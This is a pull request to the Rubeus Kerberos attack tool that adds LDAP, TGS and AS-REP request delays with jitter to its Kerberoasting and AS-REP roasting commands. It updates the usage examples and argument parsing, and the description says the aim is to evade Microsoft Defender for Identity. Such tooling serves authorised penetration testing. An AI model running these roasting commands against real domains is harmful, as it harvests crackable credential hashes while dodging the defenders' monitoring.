### PR TITLE
Add ldap delay during Kerberoast and Asreproast

### DIFF
--- a/README.md
+++ b/README.md
@@ -243,8 +243,11 @@ Rubeus is licensed under the BSD 3-Clause license.
         Perform Kerberoasting, requesting tickets only for accounts whose password was last set between 01-31-2005 and 03-29-2010, returning up to 5 service tickets:
             Rubeus.exe kerberoast /pwdsetafter:01-31-2005 /pwdsetbefore:03-29-2010 /resultlimit:5 [/ldaps] [/nowrap]
 
-        Perform Kerberoasting, with a delay of 5000 milliseconds and a jitter of 30%:
-            Rubeus.exe kerberoast /delay:5000 /jitter:30 [/ldaps] [/nowrap]
+        Perform Kerberoasting, with a delay of 5000 milliseconds between TGS requests and a jitter of 30%:
+            Rubeus.exe kerberoast /tgsdelay:5000 /jitter:30 [/ldaps] [/nowrap]
+
+        Perform Kerberoasting, with a delay of 500 seconds after the LDAP request and a jitter of 30%:
+            Rubeus.exe kerberoast /ldapdelay:500 /jitter:30 [/ldaps] [/nowrap]
 
         Perform AES Kerberoasting:
             Rubeus.exe kerberoast /aes [/ldaps] [/nowrap]
@@ -260,7 +263,15 @@ Rubeus is licensed under the BSD 3-Clause license.
 
         Perform AS-REP "roasting" for any users without preauth using alternate credentials:
             Rubeus.exe asreproast /creduser:DOMAIN.FQDN\USER /credpassword:PASSWORD [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:"OU,..."] [/ldaps] [/nowrap]
+			
+        Perform AS-REP "roasting" for any users without preauth:
+            Rubeus.exe asreproast [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:"OU=,..."] [/ldaps] [/nowrap]
+			
+        Perform AS-REP "roasting", with a delay of 5000 milliseconds between AS requests and a jitter of 30%:
+            Rubeus.exe asreproast /asdelay:5000 /jitter:30 [/ldaps] [/nowrap]
 
+        Perform AS-REP "roasting", with a delay of 500 seconds after the LDAP request and a jitter of 30%:
+            Rubeus.exe asreproast /ldapdelay:500 /jitter:30 [/ldaps] [/nowrap]
 
      Miscellaneous:
 
@@ -3029,7 +3040,9 @@ If the `/pwdsetbefore:MM-dd-yyyy` argument is supplied, only accounts whose pass
 
 If the `/resultlimit:NUMBER` argument is specified, the number of accounts that will be enumerated and roasted is limited to NUMBER.
 
-If the `/delay:MILLISECONDS` argument is specified, that number of milliseconds is paused between TGS requests. The `/jitter:1-100` flag can be combined for a % jitter.
+If the `/tgsdelay:MILLISECONDS` argument is specified, that number of milliseconds is paused between TGS requests. The `/jitter:1-100` flag can be combined for a % jitter.
+
+If the `/ldapdelay:SECONDS` argument is specified, that number of seconds is paused after the LDAP request. The `/jitter:1-100` flag can be combined for a % jitter.
 
 If the `/enterprise` flag is used, the spn is assumed to be an enterprise principal (i.e. *user@domain.com*). This flag only works when kerberoasting with a TGT.
 
@@ -3318,6 +3331,11 @@ Also, if you wanted to use alternate domain credentials for kerberoasting, that 
 The output `/format:X` defaults to John the Ripper ([Jumbo version](https://github.com/magnumripper/JohnTheRipper)). `/format:hashcat` is also an option for the new hashcat mode 18200.
 
 If the `/ldaps` flag is used, any LDAP queries will go over TLS (port 636).
+
+If the `/asdelay:MILLISECONDS` argument is specified, that number of milliseconds is paused between AS requests. The `/jitter:1-100` flag can be combined for a % jitter.
+
+If the `/ldapdelay:SECONDS` argument is specified, that number of seconds is paused after the LDAP request. The `/jitter:1-100` flag can be combined for a % jitter.
+
 
 AS-REP roasting all users in the current domain:
 

--- a/Rubeus/Commands/Asreproast.cs
+++ b/Rubeus/Commands/Asreproast.cs
@@ -20,6 +20,9 @@ namespace Rubeus.Commands
             string format = "john";
             string ldapFilter = "";
             string outFile = "";
+            int ldapdelay = 0;
+            int asdelay = 0;
+            int jitter = 0;
             bool ldaps = false;
             System.Net.NetworkCredential cred = null;
 
@@ -66,6 +69,44 @@ namespace Rubeus.Commands
                 ldaps = true;
             }
 
+            if (arguments.ContainsKey("/ldapdelay"))
+            {
+                ldapdelay = Int32.Parse(arguments["/ldapdelay"]);
+                if (ldapdelay < 1)
+                {
+                    Console.WriteLine("[!] WARNING: ldap delay is in seconds! Please enter a value > 1.");
+                    return;
+                }
+            }
+
+            if (arguments.ContainsKey("/asdelay"))
+            {
+                asdelay = Int32.Parse(arguments["/asdelay"]);
+                if (asdelay < 100)
+                {
+                    Console.WriteLine("[!] WARNING: delay is in milliseconds! Please enter a value > 100.");
+                    return;
+                }
+            }
+
+            if (arguments.ContainsKey("/jitter"))
+            {
+                try
+                {
+                    jitter = Int32.Parse(arguments["/jitter"]);
+                }
+                catch
+                {
+                    Console.WriteLine("[X] Jitter must be an integer between 1-100.");
+                    return;
+                }
+                if (jitter <= 0 || jitter > 100)
+                {
+                    Console.WriteLine("[X] Jitter must be between 1-100");
+                    return;
+                }
+            }
+
             if (String.IsNullOrEmpty(domain))
             {
                 domain = System.Net.NetworkInformation.IPGlobalProperties.GetIPGlobalProperties().DomainName;
@@ -93,7 +134,7 @@ namespace Rubeus.Commands
 
                 cred = new System.Net.NetworkCredential(userName, password, domainName);
             }
-            Roast.ASRepRoast(domain, user, ou, dc, format, cred, outFile, ldapFilter, ldaps);
+            Roast.ASRepRoast(domain, user, ou, dc, format, cred, outFile, ldapFilter, ldaps, ldapdelay, asdelay, jitter);
         }
     }
 }

--- a/Rubeus/Commands/Kerberoast.cs
+++ b/Rubeus/Commands/Kerberoast.cs
@@ -29,7 +29,8 @@ namespace Rubeus.Commands
             string pwdSetAfter = "";
             string pwdSetBefore = "";
             int resultLimit = 0;
-            int delay = 0;
+            int tgsdelay = 0;
+            int ldapdelay = 0;
             int jitter = 0;
             bool simpleOutput = false;
             bool enterprise = false;
@@ -156,11 +157,21 @@ namespace Rubeus.Commands
                 // limit the number of roastable users
                 resultLimit = Convert.ToInt32(arguments["/resultlimit"]);
             }
-            
-            if (arguments.ContainsKey("/delay"))
+
+            if (arguments.ContainsKey("/ldapdelay"))
             {
-                delay = Int32.Parse(arguments["/delay"]);
-                if(delay < 100)
+                ldapdelay = Int32.Parse(arguments["/ldapdelay"]);
+                if (ldapdelay < 1)
+                {
+                    Console.WriteLine("[!] WARNING: ldap delay is in seconds! Please enter a value > 1.");
+                    return;
+                }
+            }
+
+            if (arguments.ContainsKey("/tgsdelay"))
+            {
+                tgsdelay = Int32.Parse(arguments["/tgsdelay"]);
+                if(tgsdelay < 100)
                 {
                     Console.WriteLine("[!] WARNING: delay is in milliseconds! Please enter a value > 100.");
                     return;
@@ -248,7 +259,7 @@ namespace Rubeus.Commands
                 return;
             }
 
-            Roast.Kerberoast(spn, spns, user, OU, domain, dc, cred, outFile, simpleOutput, TGT, useTGTdeleg, supportedEType, pwdSetAfter, pwdSetBefore, ldapFilter, resultLimit, delay, jitter, listUsers, enterprise, autoenterprise, ldaps, nopreauth);
+            Roast.Kerberoast(spn, spns, user, OU, domain, dc, cred, outFile, simpleOutput, TGT, useTGTdeleg, supportedEType, pwdSetAfter, pwdSetBefore, ldapFilter, resultLimit, ldapdelay, tgsdelay, jitter, listUsers, enterprise, autoenterprise, ldaps, nopreauth);
         }
     }
 }

--- a/Rubeus/Domain/Info.cs
+++ b/Rubeus/Domain/Info.cs
@@ -171,8 +171,11 @@ namespace Rubeus.Domain
     Perform Kerberoasting, requesting tickets only for accounts whose password was last set between 01-31-2005 and 03-29-2010, returning up to 5 service tickets:
         Rubeus.exe kerberoast /pwdsetafter:01-31-2005 /pwdsetbefore:03-29-2010 /resultlimit:5 [/ldaps] [/nowrap]
 
-    Perform Kerberoasting, with a delay of 5000 milliseconds and a jitter of 30%:
-        Rubeus.exe kerberoast /delay:5000 /jitter:30 [/ldaps] [/nowrap]
+    Perform Kerberoasting, with a delay of 5000 milliseconds between TGS requests and a jitter of 30%:
+        Rubeus.exe kerberoast /tgsdelay:5000 /jitter:30 [/ldaps] [/nowrap]
+
+    Perform Kerberoasting, with a delay of 500 seconds after the LDAP request and a jitter of 30%:
+        Rubeus.exe kerberoast /ldapdelay:500 /jitter:30 [/ldaps] [/nowrap]
 
     Perform AES Kerberoasting:
         Rubeus.exe kerberoast /aes [/ldaps] [/nowrap]
@@ -189,6 +192,11 @@ namespace Rubeus.Domain
     Perform AS-REP ""roasting"" for any users without preauth using alternate credentials:
         Rubeus.exe asreproast /creduser:DOMAIN.FQDN\USER /credpassword:PASSWORD [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:""OU,...""] [/ldaps] [/nowrap]
 
+    Perform AS-REP ""roasting"", with a delay of 5000 milliseconds between AS requests and a jitter of 30%:
+        Rubeus.exe asreproast /asdelay:5000 /jitter:30 [/ldaps] [/nowrap]
+
+    Perform AS-REP ""roasting"", with a delay of 500 seconds after the LDAP request and a jitter of 30%:
+        Rubeus.exe asreproast /ldapdelay:500 /jitter:30 [/ldaps] [/nowrap]
 
  Miscellaneous:
 


### PR DESCRIPTION
Quick PR to add a delay option between the LDAP request and the roasting features (Kerberoasing and Asreproasting)

Based on @yaumn_ and @mickaelweb blog post https://www.synacktiv.com/publications/a-dive-into-microsoft-defender-for-identity.html